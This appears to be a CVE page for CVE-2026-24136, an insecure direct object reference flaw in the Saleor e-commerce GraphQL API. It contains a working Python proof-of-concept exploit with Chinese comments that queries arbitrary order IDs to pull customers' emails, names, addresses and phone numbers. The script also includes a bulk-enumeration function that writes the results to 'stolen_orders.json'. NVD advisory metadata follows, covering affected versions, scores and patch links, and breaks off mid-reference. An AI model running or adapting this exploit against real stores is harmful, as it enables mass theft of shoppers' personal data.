CVE-2026-24136

# CVE-2026-24136 PoC - Saleor IDOR漏洞利用 # 攻击者可以通过遍历订单ID获取任意用户订单信息 import requests import json TARGET_URL = "https://target-saleor-instance/graphql/" def exploit_idor(target_url, order_id): """ 利用Saleor IDOR漏洞获取指定订单的敏感信息 Args: target_url: Saleor GraphQL API地址 order_id: 目标订单ID Returns: 订单敏感信息（JSON格式） """ # 构造恶意的GraphQL查询，直接传入任意订单ID query = ''' query { order(id: "%s") { id number status user { email firstName lastName } billingAddress { firstName lastName streetAddress1 streetAddress2 city postalCode country { country } phone } shippingAddress { firstName lastName streetAddress1 streetAddress2 city postalCode country { country } phone } lines { productName variantName quantity unitPrice { amount currency } } total { amount currency } } } ''' % order_id headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } response = requests.post( target_url, json={"query": query}, headers=headers, timeout=10 ) return response.json() def mass_exploit(target_url, start_id, end_id): """ 批量利用：遍历指定范围的订单ID收集用户数据 """ results = [] for order_id in range(start_id, end_id + 1): try: data = exploit_idor(target_url, f"Order-{order_id}") if "errors" not in data and data.get("data", {}).get("order"): order_info = data["data"]["order"] results.append(order_info) print(f"[+] 获取订单 {order_id} 成功") except Exception as e: print(f"[-] 获取订单 {order_id} 失败: {e}") # 保存收集到的数据 with open("stolen_orders.json", "w") as f: json.dump(results, f, indent=2, ensure_ascii=False) return results # 示例使用 if __name__ == "__main__": # 单个订单测试 result = exploit_idor(TARGET_URL, "Order-1001") print(json.dumps(result, indent=2, ensure_ascii=False))

{"cve": {"id": "CVE-2026-24136", "sourceIdentifier": "[email protected]", "published": "2026-01-24T00:15:49.167", "lastModified": "2026-02-12T16:15:00.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Saleor is an e-commerce platform. Versions 3.2.0 through 3.20.109, 3.21.0-a.0 through 3.21.44 and 3.22.0-a.0 through 3.22.28 have a n Insecure Direct Object Reference (IDOR) vulnerability that allows unauthenticated actors to extract sensitive information in plain text. Orders created before Saleor 3.2.0 could have PIIs exfiltrated. The issue has been patched in Saleor versions: 3.22.29, 3.21.45, and 3.20.110. To workaround, temporarily block non-staff users from fetching order information (the order() GraphQL query) using a WAF."}, {"lang": "es", "value": "Saleor es una plataforma de comercio electrónico. Las versiones 3.2.0 a 3.20.109, 3.21.0-a.0 a 3.21.44 y 3.22.0-a.0 a 3.22.28 tienen una vulnerabilidad de Referencia Directa Insegura a Objeto (IDOR) que permite a actores no autenticados extraer información sensible en texto plano. Los pedidos creados antes de Saleor 3.2.0 podrían haber tenido PIIs exfiltrados. El problema ha sido parcheado en las versiones de Saleor: 3.22.29, 3.21.45 y 3.20.110. Como solución alternativa, bloquee temporalmente a los usuarios que no son personal de obtener información de pedidos (la consulta GraphQL order()) usando un WAF."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:saleor:saleor:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.2.0", "versionEndExcluding": "3.20.110", "matchCriteriaId": "1D519693-9F38-49CC-A2AA-7A707AE921C4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saleor:saleor:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.21.0", "versionEndExcluding": "3.21.45", "matchCriteriaId": "CD9EA08A-C411-4D72-B4DB-27FAC65202A6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saleor:saleor:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.22.0", "versionEndExcluding": "3.22.29", "matchCriteriaId": "72EB08B2-3E6B-40B7-AFE2-783A7FDDFAA3"}]}]}], "references": [{"url": "https://github.com/saleor/saleor/commit/5dab1857fbb2801f74e2bfe86f307e4590d9d2fa", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/saleor/saleor/commit/718ce1b4fc3aef68eeac1aea0cf1d70a614ba6af", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/saleor/saleor/commit/9bcd4f9000b189297eeb3ac88cc28c6c30229153", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/saleor/saleor/commit/aeaced8acb5e01055eddec584263f77e517d5944", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/saleor/saleor/security/a ... (truncated)